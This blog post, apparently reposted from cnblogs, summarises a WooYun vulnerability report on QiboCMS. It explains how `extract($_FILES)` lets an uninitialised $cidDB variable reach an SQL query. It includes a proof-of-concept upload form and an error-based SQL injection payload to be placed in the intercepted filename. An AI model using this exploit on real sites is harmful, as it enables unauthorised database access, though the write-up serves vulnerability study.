zoukankan      html  css  js  c++  java
  • 关于wooyun-2015-096990的总结

    漏洞url:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-096990.html

    摘要

    if(!ini_get('register_globals')){
    
    	@extract($_FILES,EXTR_SKIP);//这里是漏洞点。 
    
     //可以看到上面的判断条件是 判断register globals 是不是开启的。
    
     // 如果是关闭的 才会进入。 注意是关闭 不是开启哦。。
    
      // regitser globals这个不用多说 从php 4.2开始默认都是off的
    
     // 基本都是关闭的 曾经提交漏洞 因为需要register globals on 所以被未通过。
    
     //  当是off的时候 extract来把_FILES里的读取出来 用了EXTR_SKIP参数
    
     //  所以不能覆盖之前存在的变量 但是qibo是伪全局 所以我们可以找一个未初始化的
    
     //  _FILES extract出来后 还是一个数组 所以找一个把数组循环出来的
    
     //  因为_FILES数组里的key是我们不可控制的把, 但是一些value可以控制 例如name
    
    }
    

      因为齐博的变量传入都是模拟了一个类似全局变量,只过滤了gpc,但是files没有过滤,齐博也获取了files变量,所以可以通过files绕过全局过滤,然后雨牛就找了个没有定义或初始化的变量,也就是下文中$cidDB,通过文件寻找关键字。

    发现$cidDB作为数组循环他的value的值,并且带入了sql的查询,所以可以注入.

    poc:

    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>yzmm - p2j.cn</title>
    </head>
    <body>
      <form action="http://172.16.220.169/v7_gbk/member/comment.php?job=yz" method="POST" enctype="multipart/form-data">
            ID:<input type="file" name="cidDB" value="aa" style="250px;" / ><br/>
            <input type="submit" value="提交" />
        </form>
    </body>
    </html>

    需要抓包,把filename的值改成22' and 1=2 union select exp(~(select * FROM(SELECT USER())a))#就能查询出数据。

  • 相关阅读:
    Photoshop教程,视频MP4格式转换为GIF格式
    pyqgis环境配置
    R 输出函数 格式化输出 打印函数
    linux ubuntu 更改终端的默认设置,终端大小,字体
    wps 显示所有的字符,将参考文献排序,插入目录
    在 word 中 怎么让表格旋转方向
    linux argc argv
    linux 命令行的快捷键 vim
    linux 操作系统,以及一般的操作系统 所看书籍
    win 10 快速启动 某些程序
  • 原文地址:https://www.cnblogs.com/yangxiaodi/p/6509576.html
Copyright © 2011-2022 走看看